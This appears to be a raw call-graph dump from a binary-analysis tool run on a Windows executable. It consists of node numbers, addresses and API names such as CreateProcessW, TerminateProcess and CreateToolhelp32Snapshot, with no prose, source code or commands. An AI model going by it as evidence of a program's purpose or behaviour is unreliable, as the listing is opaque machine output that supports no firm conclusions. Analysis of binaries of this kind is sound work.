100716->100647 100717->100716 103571 bb4d83 103572 bb4dba 103571->103572 103573 bb4dd8 103572->103573 103574 bb4e37 103572->103574 103611 bb4e35 103572->103611 103575 bb4ead PostQuitMessage 103573->103575 103576 bb4de5 103573->103576 103578 bb4e3d 103574->103578 103579 bf0942 103574->103579 103583 bb4e28 103575->103583 103580 bf09b5 103576->103580 103581 bb4df0 103576->103581 103577 bb4e1a DefWindowProcW 103577->103583 103584 bb4e42 103578->103584 103585 bb4e65 SetTimer RegisterWindowMessageW 103578->103585 103626 bac460 10 API calls Mailbox 103579->103626 103629 c02b3a 97 API calls _memset 103580->103629 103586 bb4df8 103581->103586 103587 bb4eb7 103581->103587 103591 bb4e49 KillTimer 103584->103591 103592 bf08e5 103584->103592 103585->103583 103588 bb4e8e CreatePopupMenu 103585->103588 103593 bf099a 103586->103593 103594 bb4e03 103586->103594 103616 bb5b29 103587->103616 103588->103583 103590 bf0969 103627 bac483 434 API calls Mailbox 103590->103627 103600 bb5ac3 Shell_NotifyIconW 103591->103600 103598 bf091e MoveWindow 103592->103598 103599 bf08ea 103592->103599 103593->103577 103628 bf8637 59 API calls Mailbox 103593->103628 103602 bb4e9b 103594->103602 103603 bb4e0e 103594->103603 103595 bf09c7 103595->103577 103595->103583 103598->103583 103604 bf08ee 103599->103604 103605 bf090d SetFocus 103599->103605 103601 bb4e5c 103600->103601 103623 ba34e4 DeleteObject DestroyWindow Mailbox 103601->103623 103624 bb5bd7 107 API calls _memset 103602->103624 103603->103577 103613 bb5ac3 Shell_NotifyIconW 103603->103613 103604->103603 103609 bf08f7 103604->103609 103605->103583 103625 bac460 10 API calls Mailbox 103609->103625 103611->103577 103612 bb4eab 103612->103583 103614 bf098e 103613->103614 103615 bb59d3 94 API calls 103614->103615 103615->103611 103617 bb5bc2 103616->103617 103618 bb5b40 _memset 103616->103618 103617->103583 103619 bb56f8 87 API calls 103618->103619 103621 bb5b67 103619->103621 103620 bb5bab KillTimer SetTimer 103620->103617 103621->103620 103622 bf0cee Shell_NotifyIconW 103621->103622 103622->103620 103623->103583 103624->103612 103625->103583 103626->103590 103627->103603 103628->103611 103629->103595 103630 ba6981 103631 ba373a 59 API calls 103630->103631 103632 ba6997 103631->103632 103637 ba7b3f 103632->103637 103634 ba69bf 103636 ba584d 103634->103636 103649 c0a2fa 89 API calls 4 library calls 103634->103649 103638 bb162d 59 API calls 103637->103638 103639 ba7b64 _wcscmp 103638->103639 103640 ba7b98 Mailbox 103639->103640 103641 bb1a36 59 API calls 103639->103641 103640->103634 103642 bdfedd 103641->103642 103643 bb17e0 59 API calls 103642->103643 103644 bdfee8 103643->103644 103650 ba3938 68 API calls 103644->103650 103646 bdfef9 103648 bdfefd Mailbox 103646->103648 103651 ba523c 59 API calls 103646->103651 103648->103634 103649->103636 103650->103646 103651->103648 100718 ba1016 100723 bb5ce7 100718->100723 100721 bc2ea0 __cinit 67 API calls 100722 ba1025 100721->100722 100724 bc0f16 Mailbox 59 API calls 100723->100724 100725 bb5cef 100724->100725 100727 ba101b 100725->100727 100730 bb5f39 100725->100730 100727->100721 100731 bb5f42 100730->100731 100732 bb5cfb 100730->100732 100733 bc2ea0 __cinit 67 API calls 100731->100733 100734 bb5d13 100732->100734 100733->100732 100735 bb1207 59 API calls 100734->100735 100736 bb5d2b GetVersionExW 100735->100736 100737 bb1821 59 API calls 100736->100737 100738 bb5d6e 100737->100738 100739 bb1981 59 API calls 100738->100739 100742 bb5d9b 100738->100742 100740 bb5d8f 100739->100740 100741 bb133d 59 API calls 100740->100741 100741->100742 100743 bb5e00 GetCurrentProcess IsWow64Process 100742->100743 100745 bf1018 100742->100745 100744 bb5e19 100743->100744 100746 bb5e98 GetSystemInfo 100744->100746 100747 bb5e2f 100744->100747 100748 bb5e65 100746->100748 100758 bb55f0 100747->100758 100748->100727 100751 bb5e8c GetSystemInfo 100754 bb5e56 100751->100754 100752 bb5e41 100753 bb55f0 2 API calls 100752->100753 100755 bb5e49 GetNativeSystemInfo 100753->100755 100754->100748 100756 bb5e5c FreeLibrary 100754->100756 100755->100754 100756->100748 100759 bb5619 100758->100759 100760 bb55f9 LoadLibraryA 100758->100760 100759->100751 100759->100752 100760->100759 100761 bb560a GetProcAddress 100760->100761 100761->100759 103652 ba1066 103657 baaaaa 103652->103657 103654 ba106c 103655 bc2ea0 __cinit 67 API calls 103654->103655 103656 ba1076 103655->103656 103658 baaacb 103657->103658 103690 bc0216 103658->103690 103662 baab12 103663 bb1207 59 API calls 103662->103663 103664 baab1c 103663->103664 103665 bb1207 59 API calls 103664->103665 103666 baab26 103665->103666 103667 bb1207 59 API calls 103666->103667 103668 baab30 103667->103668 103669 bb1207 59 API calls 103668->103669 103670 baab6e 103669->103670 103671 bb1207 59 API calls 103670->103671 103672 baac39 103671->103672 103700 bc04b3 103672->103700 103676 baac6b 103677 bb1207 59 API calls 103676->103677 103678 baac75 103677->103678 103728 bbfd56 103678->103728 103680 baacbc 103681 baaccc GetStdHandle 103680->103681 103682 baad18 103681->103682 103683 be2e69 103681->103683 103685 baad20 OleInitialize 103682->103685 103683->103682 103684 be2e72 103683->103684 103735 c06f60 64 API calls Mailbox 103684->103735 103685->103654 103687 be2e79 103736 c0762f CreateThread 103687->103736 103689 be2e85 CloseHandle 103689->103685 103737 bc02ef 103690->103737 103693 bc02ef 59 API calls 103694 bc0258 103693->103694 103695 bb1207 59 API calls 103694->103695 103696 bc0264 103695->103696 103697 bb1821 59 API calls 103696->103697 103698 baaad1 103697->103698 103699 bc06e6 6 API calls 103698->103699 103699->103662 103701 bb1207 59 API calls 103700->103701 103702 bc04c3 103701->103702 103703 bb1207 59 API calls 103702->103703 103704 bc04cb 103703->103704 103744 bb10c3 103704->103744 103707 bb10c3 59 API calls 103708 bc04db 103707->103708 103709 bb1207 59 API calls 103708->103709 103710 bc04e6 103709->103710 103711 bc0f16 Mailbox 59 API calls 103710->103711 103712 baac43 103711->103712 103713 bbfe77 103712->103713 103714 bbfe85 103713->103714 103715 bb1207 59 API calls 103714->103715 103716 bbfe90 103715->103716 103717 bb1207 59 API calls 103716->103717 103718 bbfe9b 103717->103718 103719 bb1207 59 API calls 103718->103719 103720 bbfea6 103719->103720 103721 bb1207 59 API calls 103720->103721 103722 bbfeb1 103721->103722 103723 bb10c3 59 API calls 103722->103723 103724 bbfebc 103723->103724 103725 bc0f16 Mailbox 59 API calls 103724->103725 103726 bbfec3 RegisterWindowMessageW 103725->103726 103726->103676 103729 bbfd66 103728->103729 103730 bf5ff1 103728->103730 103732 bc0f16 Mailbox 59 API calls 103729->103732 103747 c09f97 59 API calls 103730->103747 103734 bbfd6e 103732->103734 103733 bf5ffc 103734->103680 103735->103687 103736->103689 103748 c07615 65 API calls 103736->103748 103738 bb1207 59 API calls 103737->103738 103739 bc02fa 103738->103739 103740 bb1207 59 API calls 103739->103740 103741 bc0302 103740->103741 103742 bb1207 59 API calls 103741->103742 103743 bc024e 103742->103743 103743->103693 103745 bb1207 59 API calls 103744->103745 103746 bb10cb 103745->103746 103746->103707 103747->103733 100762 bde393 100774 ba373a 100762->100774 100764 bde3a9 100765 bde3bf 100764->100765 100766 bde42a 100764->100766 100825 ba5376 60 API calls 100765->100825 100783 bab020 100766->100783 100770 bde3fe 100773 bde41e Mailbox 100770->100773 100826 c08777 59 API calls Mailbox 100770->100826 100771 bdef76 Mailbox 100773->100771 100827 c0a2fa 89 API calls 4 library calls 100773->100827 100775 ba3758 100774->100775 100776 ba3746 100774->100776 100778 ba375e 100775->100778 100779 ba3787 100775->100779 100828 ba523c 59 API calls 100776->100828 100780 bc0f16 Mailbox 59 API calls 100778->100780 100829 ba523c 59 API calls 100779->100829 100782 ba3750 100780->100782 100782->100764 100830 bb3740 100783->100830 100786 be2fe6 100928 c0a2fa 89 API calls 4 library calls 100786->100928 100787 bab07f 100787->100786 100789 be3004 100787->100789 100805 babb86 100787->100805 100806 bab132 Mailbox _memmove 100787->100806 100929 c0a2fa 89 API calls 4 library calls 100789->100929 100791 be348e 100824 bab4dd 100791->100824 100972 c0a2fa 89 API calls 4 library calls 100791->100972 100792 be30ba 100792->100824 100931 c0a2fa 89 API calls 4 library calls 100792->100931 100793 be3036 100793->100792 100930 baa9de 434 API calls 100793->100930 100800 ba53b0 434 API calls 100800->100806 100801 bf70ed 59 API calls 100801->100806 100802 ba3b31 59 API calls 100802->100806 100927 c0a2fa 89 API calls 4 library calls 100805->100927 100806->100791 100806->100793 100806->100800 100806->100801 100806->100802 100806->100805 100807 be3348 100806->100807 100813 be30f3 100806->100813 100814 ba3c30 68 API calls 100806->100814 100816 be339f 100806->100816 100820 bb1c9c 59 API calls 100806->100820 100821 ba523c 59 API calls 100806->100821 100822 bc0f16 59 API calls Mailbox 100806->100822 100806->100824 100835 ba3add 100806->100835 100842 babc70 100806->100842 100925 ba3a40 59 API calls Mailbox 100806->100925 100926 ba5190 59 API calls Mailbox 100806->100926 100933 bf6a45 59 API calls 2 library calls 100806->100933 100934 c1a78b 85 API calls Mailbox 100806->100934 100935 bf6a01 59 API calls Mailbox 100806->100935 100936 c05d5f 68 API calls 100806->100936 100937 ba3ea3 68 API calls Mailbox 100806->100937 100971 c09f97 59 API calls 100806->100971 100938 ba53b0 100807->100938 100810 be3378 100810->100824 100966 ba39be 100810->100966 100932 c0a2fa 89 API calls 4 library calls 100813->100932 100814->100806 100970 c0a2fa 89 API calls 4 library calls 100816->100970 100820->100806 100821->100806 100822->100806 100824->100773 100825->100770 100826->100773 100827->100771 100828->100782 100829->100782 100831 bb374f 100830->100831 100834 bb376a 100830->100834 100832 bb1aa4 59 API calls 100831->100832 100833 bb3757 CharUpperBuffW 100832->100833 100833->100834 100834->100787 100836 bdd2fd 100835->100836 100837 ba3aee 100835->100837 100838 bc0f16 Mailbox 59 API calls 100837->100838 100839 ba3af5 100838->100839 100840 ba3b16 100839->100840 100973 ba3ba5 59 API calls Mailbox 100839->100973 100840->100806 100843 be34cf 100842->100843 100854 babc95 100842->100854 101094 c0a2fa 89 API calls 4 library calls 100843->101094 100845 babf3b 100845->100806 100849 bac2b6 100849->100845 100850 bac2c3 100849->100850 101092 bac483 434 API calls Mailbox 100850->101092 100852 bac2ca LockWindowUpdate DestroyWindow GetMessageW 100852->100845 100855 bac2fc 100852->100855 100916 babca5 Mailbox 100854->100916 101095 ba5376 60 API calls 100854->101095 101096 bf6def 434 API calls 100854->101096 100856 be4439 TranslateMessage DispatchMessageW GetMessageW 100855->100856 100856->100856 100858 be4469 100856->100858 100857 be35e3 Sleep 100857->100916 100858->100845 100859 be3f8d WaitForSingleObject 100863 be3fad GetExitCodeProcess CloseHandle 100859->100863 100859->100916 100860 babf54 timeGetTime 100860->100916 100862 bac210 Sleep 100899 bac1fa Mailbox 100862->100899 100868 bac36b 100863->100868 100865 bb1207 59 API calls 100865->100899 100867 be42d9 Sleep 100867->100899 100868->100806 100869 bc0f16 59 API calls Mailbox 100869->100916 100870 ba6cd8 412 API calls 100870->100916 100872 bac324 timeGetTime 101093 ba5376 60 API calls 100872->101093 100873 bc074e timeGetTime 100873->100899 100876 be4370 GetExitCodeProcess 100879 be439c CloseHandle 100876->100879 100880 be4386 WaitForSingleObject 100876->100880 100878 ba6d79 109 API calls 100878->100916 100879->100899 100880->100879 100880->100916 100882 c2632a 110 API calls 100882->100899 100884 ba5376 60 API calls 100884->100916 100885 be3feb 100885->100868 100886 be37da Sleep 100886->100916 100887 be43f8 Sleep 100887->100916 100890 bb1a36 59 API calls 100890->100899 100894 bab020 412 API calls 100894->100916 100896 bac26d 100898 bb1a36 59 API calls 100896->100898 100902 babf25 Mailbox 100898->100902 100899->100862 100899->100865 100899->100868 100899->100873 100899->100876 100899->100882 100899->100885 100899->100886 100899->100887 100899->100890 100899->100916 101125 c02a1b 60 API calls 100899->101125 101126 ba5376 60 API calls 100899->101126 101127 ba3ea3 68 API calls Mailbox 100899->101127 101128 ba6cd8 434 API calls 100899->101128 101169 bf6ec5 59 API calls 100899->101169 101170 c0566c QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100899->101170 101171 c03fb5 CreateToolhelp32Snapshot Process32FirstW 100899->101171 100901 c0a2fa 89 API calls 100901->100916 100902->100845 101091 bac460 10 API calls Mailbox 100902->101091 100903 bb1a36 59 API calls 100903->100916 100905 ba5190 59 API calls Mailbox 100905->100916 100907 ba53b0 412 API calls 100907->100916 100908 ba39be 68 API calls 100908->100916 100910 bf6ad4 59 API calls Mailbox 100910->100916 100911 be3d43 VariantClear 100911->100916 100912 be3dd9 VariantClear 100912->100916 100913 be3b87 VariantClear 100913->100916 100914 ba41c4 59 API calls Mailbox 100914->100916 100915 bf7890 59 API calls 100915->100916 100916->100857 100916->100859 100916->100860 100916->100862 100916->100867 100916->100868 100916->100869 100916->100870 100916->100872 100916->100878 100916->100884 100916->100894 100916->100896 100916->100899 100916->100901 100916->100902 100916->100903 100916->100905 100916->100907 100916->100908 100916->100910 100916->100911 100916->100912 100916->100913 100916->100914 100916->100915 100917 ba3ea3 68 API calls 100916->100917 100974 ba52b0 100916->100974 100983 ba9a00 100916->100983 100990 ba9c80 100916->100990 101021 baa820 100916->101021 101038 c03f97 100916->101038 101041 c1f704 100916->101041 101044 c1e3d4 100916->101044 101047 c0c0dd 100916->101047 101054 c0e30d 100916->101054 101057 bb42cf 100916->101057 101061 c0bb43 100916->101061 101097 bb1c9c 100916->101097 101101 c2641d 59 API calls 100916->101101 101102 c09ec5 59 API calls Mailbox 100916->101102 101103 bfde8d 59 API calls 100916->101103 101104 ba4d37 100916->101104 101122 bf6a45 59 API calls 2 library calls 100916->101122 101123 ba38ff 59 API calls 100916->101123 101124 ba3a40 59 API calls Mailbox 100916->101124 101129 c1c11d 100916->101129 100917->100916 100925->100806 100926->100806 100927->100786 100928->100824 100929->100824 100930->100792 100931->100824 100932->100824 100933->100806 100934->100806 100935->100806 100936->100806 100937->100806 100939 ba53cf 100938->100939 100960 ba53fd Mailbox 100938->100960 100940 bc0f16 Mailbox 59 API calls 100939->100940 100940->100960 100941 ba69fa 100942 bb1c9c 59 API calls 100941->100942 100963 ba5569 Mailbox 100942->100963 100943 ba69ff 100945 bdf095 100943->100945 100946 bde5c1 100943->100946 100944 bc0f16 59 API calls Mailbox 100944->100960 101929 c0a2fa 89 API calls 4 library calls 100945->101929 101925 c0a2fa 89 API calls 4 library calls 100946->101925 100947 bb1207 59 API calls 100947->100960 100948 ba5a1a 101928 c0a2fa 89 API calls 4 library calls 100948->101928 100952 bde5d0 100952->100810 100953 bde9ca 100957 bb1c9c 59 API calls 100953->100957 100955 bb1c9c 59 API calls 100955->100960 100957->100963 100958 bdea97 100958->100963 101926 bf7890 59 API calls 100958->101926 100959 bc2ea0 67 API calls __cinit 100959->100960 100960->100941 100960->100943 100960->100944 100960->100946 100960->100947 100960->100948 100960->100953 100960->100955 100960->100958 100960->100959 100961 bf7890 59 API calls 100960->100961 100960->100963 100964 bdee58 100960->100964 101923 ba7e50 434 API calls 2 library calls 100960->101923 101924 ba6e30 60 API calls Mailbox 100960->101924 100961->100960 100963->100810 101927 c0a2fa 89 API calls 4 library calls 100964->101927 100967 ba39c9 100966->100967 100968 ba39f0 100967->100968 101930 ba3ea3 68 API calls Mailbox 100967->101930 100968->100816 100970->100824 100971->100806 100972->100824 100973->100840 100975 ba52c6 100974->100975 100979 ba5313 100974->100979 100976 ba52d3 PeekMessageW 100975->100976 100975->100979 100977 ba52ec 100976->100977 100976->100979 100977->100916 100979->100977 100980 bdde98 TranslateAcceleratorW 100979->100980 100981 ba533e PeekMessageW 100979->100981 100982 ba5352 TranslateMessage DispatchMessageW 100979->100982 101181 ba359e 100979->101181 100980->100979 100980->100981 100981->100977 100981->100979 100982->100981 100984 ba9a1d 100983->100984 100985 ba9a31 100983->100985 101186 ba94e0 100984->101186 101220 c0a2fa 89 API calls 4 library calls 100985->101220 100988 ba9a28 100988->100916 100989 be23a8 100989->100989 100991 ba9cb5 100990->100991 100992 be23ad 100991->100992 100995 ba9d1f 100991->100995 101006 ba9d79 100991->101006 100993 ba53b0 434 API calls 100992->100993 100994 be23c2 100993->100994 101010 ba9f50 Mailbox 100994->101010 101230 c0a2fa 89 API calls 4 library calls 100994->101230 100998 bb1207 59 API calls 100995->100998 100995->101006 100996 bb1207 59 API calls 100996->101006 101000 be2408 100998->101000 100999 baa058 100999->100916 101002 bc2ea0 __cinit 67 API calls 101000->101002 101001 bc2ea0 __cinit 67 API calls 101001->101006 101002->101006 101003 be242a 101003->100916 101004 c0a2fa 89 API calls 101004->101010 101005 ba39be 68 API calls 101005->101010 101006->100996 101006->101001 101006->101003 101009 ba9f3a 101006->101009 101006->101010 101008 baa775 101235 c0a2fa 89 API calls 4 library calls 101008->101235 101009->101010 101231 c0a2fa 89 API calls 4 library calls 101009->101231 101010->100999 101010->101004 101010->101005 101010->101008 101012 ba53b0 434 API calls 101010->101012 101016 ba4230 59 API calls 101010->101016 101229 bb1bcc 59 API calls 2 library calls 101010->101229 101232 bf7890 59 API calls 101010->101232 101233 c1ca74 434 API calls 101010->101233 101234 c1b9ee 434 API calls Mailbox 101010->101234 101236 ba5190 59 API calls Mailbox 101010->101236 101237 c19878 434 API calls Mailbox 101010->101237 101012->101010 101015 be2729 101015->100916 101016->101010 101022 be2c81 101021->101022 101025 baa84c 101021->101025 101239 c0a2fa 89 API calls 4 library calls 101022->101239 101024 be2c92 101024->100916 101026 be2c9a 101025->101026 101031 baa888 _memmove 101025->101031 101240 c0a2fa 89 API calls 4 library calls 101026->101240 101028 baa975 101028->100916 101030 bc0f16 59 API calls Mailbox 101030->101031 101031->101028 101031->101030 101032 be2cde 101031->101032 101034 ba53b0 434 API calls 101031->101034 101035 be2cf8 101031->101035 101037 baa962 101031->101037 101241 baa9de 434 API calls 101032->101241 101034->101031 101035->101028 101242 c0a2fa 89 API calls 4 library calls 101035->101242 101037->101028 101238 c1a78b 85 API calls Mailbox 101037->101238 101243 c047b7 GetFileAttributesW 101038->101243 101247 c1fb45 101041->101247 101360 c1cf8e 101044->101360 101046 c1e3e4 101046->100916 101048 ba4d37 84 API calls 101047->101048 101049 c0c0f3 101048->101049 101491 c03e72 101049->101491 101051 c0c0fb 101052 c0c0ff GetLastError 101051->101052 101053 c0c114 101051->101053 101052->101053 101053->100916 101589 c0f6ea 101054->101589 101056 c0e31d 101056->100916 101058 bb42d9 101057->101058 101059 bb42e8 101057->101059 101058->100916 101059->101058 101060 bb42ed FindCloseChangeNotification 101059->101060 101060->101058 101062 c0bc28 Mailbox 101061->101062 101063 c0bb62 101061->101063 101065 ba4d37 84 API calls 101062->101065 101089 c0bc30 Mailbox 101062->101089 101064 ba502b 59 API calls 101063->101064 101066 c0bb6d 101064->101066 101067 c0bc60 101065->101067 101069 ba502b 59 API calls 101066->101069 101068 ba4d37 84 API calls 101067->101068 101070 c0bc72 101068->101070 101071 c0bb81 101069->101071 101737 c03b4f 101070->101737 101071->101062 101073 bb1207 59 API calls 101071->101073 101074 c0bb92 101073->101074 101075 bb1207 59 API calls 101074->101075 101076 c0bb9b 101075->101076 101077 ba4d37 84 API calls 101076->101077 101078 c0bba8 101077->101078 101079 bc0044 59 API calls 101078->101079 101080 c0bbbb 101079->101080 101081 bb17e0 59 API calls 101080->101081 101082 c0bbcc 101081->101082 101083 c03f97 3 API calls 101082->101083 101090 c0bbf5 Mailbox 101082->101090 101085 c0bbdb 101083->101085 101084 ba502b 59 API calls 101084->101062 101086 bb1a36 59 API calls 101085->101086 101085->101090 101087 c0bbec 101086->101087 101725 c03d8a 101087->101725 101089->100916 101090->101084 101091->100849 101092->100852 101093->100916 101094->100854 101095->100854 101096->100854 101098 bb1caf 101097->101098 101099 bb1ca7 101097->101099 101098->100916 101853 bb1bcc 59 API calls 2 library calls 101099->101853 101101->100916 101102->100916 101103->100916 101105 ba4d51 101104->101105 101117 ba4d4b 101104->101117 101106 bdda58 __i64tow 101105->101106 101107 ba4d99 101105->101107 101108 ba4d57 __itow 101105->101108 101113 bdd95f 101105->101113 101854 bc37fa 83 API calls 3 library calls 101107->101854 101110 bc0f16 Mailbox 59 API calls 101108->101110 101114 ba4d71 101110->101114 101112 bdd9d7 Mailbox _wcscpy 101855 bc37fa 83 API calls 3 library calls 101112->101855 101113->101112 101115 bc0f16 Mailbox 59 API calls 101113->101115 101116 bb1a36 59 API calls 101114->101116 101114->101117 101118 bdd9a4 101115->101118 101116->101117 101117->100916 101119 bc0f16 Mailbox 59 API calls 101118->101119 101120 bdd9ca 101119->101120 101120->101112 101121 bb1a36 59 API calls 101120->101121 101121->101112 101122->100916 101123->100916 101124->100916 101125->100899 101126->100899 101127->100899 101128->100899 101130 c1c162 101129->101130 101131 c1c148 101129->101131 101856 c1a6c5 101130->101856 101883 c0a2fa 89 API calls 4 library calls 101131->101883 101135 ba53b0 433 API calls 101136 c1c1ce 101135->101136 101137 c1c15a Mailbox 101136->101137 101138 c1c260 101136->101138 101142 c1c20f 101136->101142 101137->100916 101139 c1c2b6 101138->101139 101140 c1c266 101138->101140 101139->101137 101141 ba4d37 84 API calls 101139->101141 101884 c07d42 59 API calls 101140->101884 101143 c1c2c8 101141->101143 101147 c07707 59 API calls 101142->101147 101145 bb1aa4 59 API calls 101143->101145 101149 c1c2ec CharUpperBuffW 101145->101149 101146 c1c289 101885 bb35b9 59 API calls Mailbox 101146->101885 101148 c1c23f 101147->101148 101151 bf6c9f 433 API calls 101148->101151 101153 c1c306 101149->101153 101151->101137 101152 c1c291 Mailbox 101157 bab020 433 API calls 101152->101157 101154 c1c359 101153->101154 101155 c1c30d 101153->101155 101156 ba4d37 84 API calls 101154->101156 101863 c07707 101155->101863 101158 c1c361 101156->101158 101157->101137 101886 ba5376 60 API calls 101158->101886 101163 c1c36b 101163->101137 101164 ba4d37 84 API calls 101163->101164 101165 c1c386 101164->101165 101887 bb35b9 59 API calls Mailbox 101165->101887 101167 c1c396 101168 bab020 433 API calls 101167->101168 101168->101137 101169->100899 101170->100899 101915 c04b4f 101171->101915 101173 c040b1 FindCloseChangeNotification 101173->100899 101174 c04002 Process32NextW 101174->101173 101180 c03ffb Mailbox 101174->101180 101175 bb1207 59 API calls 101175->101180 101176 bb1a36 59 API calls 101176->101180 101177 bc0044 59 API calls 101177->101180 101178 bb17e0 59 API calls 101178->101180 101179 bb151f 61 API calls 101179->101180 101180->101173 101180->101174 101180->101175 101180->101176 101180->101177 101180->101178 101180->101179 101182 ba35e2 101181->101182 101184 ba35b0 101181->101184 101182->100979 101183 ba35d5 IsDialogMessageW 101183->101182 101183->101184 101184->101182 101184->101183 101185 bdd1a3 GetClassLongW 101184->101185 101185->101183 101185->101184 101187 ba53b0 434 API calls 101186->101187 101188 ba951f 101187->101188 101189 be1f31 101188->101189 101203 ba9527 _memmove 101188->101203 101222 ba5190 59 API calls Mailbox 101189->101222 101191 be21f0 101228 c0a2fa 89 API calls 4 library calls 101191->101228 101193 be220e 101193->101193 101194 ba9583 101194->100988 101195 ba9944 101197 bc0f16 Mailbox 59 API calls 101195->101197 101196 ba986a 101198 ba987f 101196->101198 101199 be21e1 101196->101199 101210 ba96e3 _memmove 101197->101210 101201 bc0f16 Mailbox 59 API calls 101198->101201 101227 c1a74b 59 API calls 101199->101227 101213 ba977d 101201->101213 101202 bc0f16 59 API calls Mailbox 101202->101203 101203->101191 101203->101194 101203->101195 101203->101202 101205 ba96cf 101203->101205 101218 ba9741 101203->101218 101204 bc0f16 Mailbox 59 API calls 101209 ba970e 101204->101209 101205->101195 101206 ba96dc 101205->101206 101208 bc0f16 Mailbox 59 API calls 101206->101208 101207 be21d0 101226 c0a2fa 89 API calls 4 library calls 101207->101226 101208->101210 101209->101218 101221 bacca0 434 API calls 101209->101221 101210->101204 101210->101209 101210->101218 101213->100988 101215 be21a8 101225 c0a2fa 89 API calls 4 library calls 101215->101225 101217 be2183 101224 c0a2fa 89 API calls 4 library calls 101217->101224 101218->101196 101218->101207 101218->101213 101218->101215 101218->101217 101223 ba8180 434 API calls 101218->101223 101220->100989 101221->101218 101222->101195 101223->101218 101224->101213 101225->101213 101226->101213 101227->101191 101228->101193 101229->101010 101230->101010 101231->101010 101232->101010 101233->101010 101234->101010 101235->101015 101236->101010 101237->101010 101238->101028 101239->101024 101240->101028 101241->101035 101242->101028 101244 c03f9e 101243->101244 101245 c047d2 FindFirstFileW 101243->101245 101244->100916 101245->101244 101246 c047e7 FindClose 101245->101246 101246->101244 101248 c1fb6b _memset 101247->101248 101249 c1fbd2 101248->101249 101250 c1fba8 101248->101250 101254 ba502b 59 API calls 101249->101254 101255 c1fbf6 101249->101255 101334 ba502b 101250->101334 101252 c1fbb3 101252->101255 101257 ba502b 59 API calls 101252->101257 101253 c1fc30 101259 ba4d37 84 API calls 101253->101259 101256 c1fbc8 101254->101256 101255->101253 101258 ba502b 59 API calls 101255->101258 101261 ba502b 59 API calls 101256->101261 101257->101256 101258->101253 101260 c1fc54 101259->101260 101330 bb436a 101260->101330 101261->101255 101263 c1fc5e 101264 c1fd21 101263->101264 101265 c1fc68 101263->101265 101267 c1fd53 GetCurrentDirectoryW 101264->101267 101270 ba4d37 84 API calls 101264->101270 101266 ba4d37 84 API calls 101265->101266 101268 c1fc79 101266->101268 101269 bc0f16 Mailbox 59 API calls 101267->101269 101271 bb436a 59 API calls 101268->101271 101272 c1fd78 GetCurrentDirectoryW 101269->101272 101273 c1fd38 101270->101273 101274 c1fc83 101271->101274 101275 c1fd85 101272->101275 101276 bb436a 59 API calls 101273->101276 101277 ba4d37 84 API calls 101274->101277 101286 c1fdbe 101275->101286 101338 ba4f98 101275->101338 101278 c1fd42 __wsetenvp 101276->101278 101279 c1fc94 101277->101279 101278->101267 101278->101286 101280 bb436a 59 API calls 101279->101280 101282 c1fc9e 101280->101282 101284 ba4d37 84 API calls 101282->101284 101288 c1fcaf 101284->101288 101285 ba4f98 59 API calls 101289 c1fdae 101285->101289 101287 c1fe0a 101286->101287 101351 c074bf 8 API calls 101286->101351 101292 c1fe36 101287->101292 101293 c1fedc CreateProcessW 101287->101293 101294 bb436a 59 API calls 101288->101294 101295 ba4f98 59 API calls 101289->101295 101291 c1fdd5 101352 c073ce 8 API calls 101291->101352 101354 bf8cd6 76 API calls 101292->101354 101329 c1fe6f __wsetenvp 101293->101329 101298 c1fcb9 101294->101298 101295->101286 101301 c1fcef GetSystemDirectoryW 101298->101301 101306 ba4d37 84 API calls 101298->101306 101299 c1fdf0 101353 c07447 8 API calls 101299->101353 101300 c1fe3b 101304 c1fe63 101300->101304 101305 c1fe6a 101300->101305 101303 bc0f16 Mailbox 59 API calls 101301->101303 101307 c1fd14 GetSystemDirectoryW 101303->101307 101355 bf8d11 149 API calls 4 library calls 101304->101355 101356 bf8fb2 6 API calls 101305->101356 101309 c1fcd0 101306->101309 101307->101275 101312 bb436a 59 API calls 101309->101312 101311 c1fe68 101311->101329 101313 c1fcda __wsetenvp 101312->101313 101313->101275 101313->101301 101314 c1ff58 CloseHandle 101316 c1ff66 101314->101316 101323 c1ff90 101314->101323 101315 c1ff1b 101319 c1ff2c GetLastError 101315->101319 101357 c07072 CloseHandle Mailbox 101316->101357 101318 c1ff96 101321 c1ff40 101318->101321 101319->101321 101358 c06e9c CloseHandle Mailbox 101321->101358 101323->101318 101327 c1ffc2 CloseHandle 101323->101327 101325 c1f716 101325->100916 101327->101321 101329->101314 101329->101315 101331 bb4374 __wsetenvp 101330->101331 101332 bc0f16 Mailbox 59 API calls 101331->101332 101333 bb4389 _wcscpy 101332->101333 101333->101263 101335 ba5041 101334->101335 101336 ba503c 101334->101336 101335->101252 101336->101335 101359 bc36ec 59 API calls 101336->101359 101339 ba4fa8 101338->101339 101340 bddc5b 101338->101340 101345 bc0f16 Mailbox 59 API calls 101339->101345 101341 bddc6c 101340->101341 101343 bb1821 59 API calls 101340->101343 101342 bb19e1 59 API calls 101341->101342 101344 bddc76 101342->101344 101343->101341 101348 ba4fd4 101344->101348 101349 bb1207 59 API calls 101344->101349 101346 ba4fbb 101345->101346 101346->101344 101347 ba4fc6 101346->101347 101347->101348 101350 bb1a36 59 API calls 101347->101350 101348->101285 101349->101348 101350->101348 101351->101291 101352->101299 101353->101287 101354->101300 101355->101311 101356->101329 101358->101325 101359->101335 101361 ba4d37 84 API calls 101360->101361 101362 c1cfcb 101361->101362 101385 c1d012 Mailbox 101362->101385 101398 c1dc56 101362->101398 101364 c1d26a 101365 c1d3df 101364->101365 101369 c1d278 101364->101369 101449 c1dd79 92 API calls Mailbox 101365->101449 101368 c1d3ee 101368->101369 101370 c1d3fa 101368->101370 101411 c1ce1f 101369->101411 101370->101385 101371 ba4d37 84 API calls 101388 c1d063 Mailbox 101371->101388 101376 c1d2b1 101426 bc0d68 101376->101426 101379 c1d2e4 101434 ba47be 101379->101434 101380 c1d2cb 101433 c0a2fa 89 API calls 4 library calls 101380->101433 101383 c1d2d6 GetCurrentProcess TerminateProcess 101383->101379 101385->101046 101388->101364 101388->101371 101388->101385 101431 c00267 59 API calls 2 library calls 101388->101431 101432 c1d490 61 API calls 2 library calls 101388->101432 101389 c1d455 101389->101385 101393 c1d469 FreeLibrary 101389->101393 101391 c1d31c 101446 c1dafa 107 API calls _free 101391->101446 101393->101385 101397 c1d32d 101397->101389 101447 ba4230 59 API calls Mailbox 101397->101447 101448 ba523c 59 API calls 101397->101448 101450 c1dafa 107 API calls _free 101397->101450 101399 bb1aa4 59 API calls 101398->101399 101400 c1dc71 CharLowerBuffW 101399->101400 101451 bff6e6 101400->101451 101404 bb1207 59 API calls 101405 c1dcaa 101404->101405 101458 bb1462 101405->101458 101407 c1dcc1 101408 bb1981 59 API calls 101407->101408 101409 c1dccd Mailbox 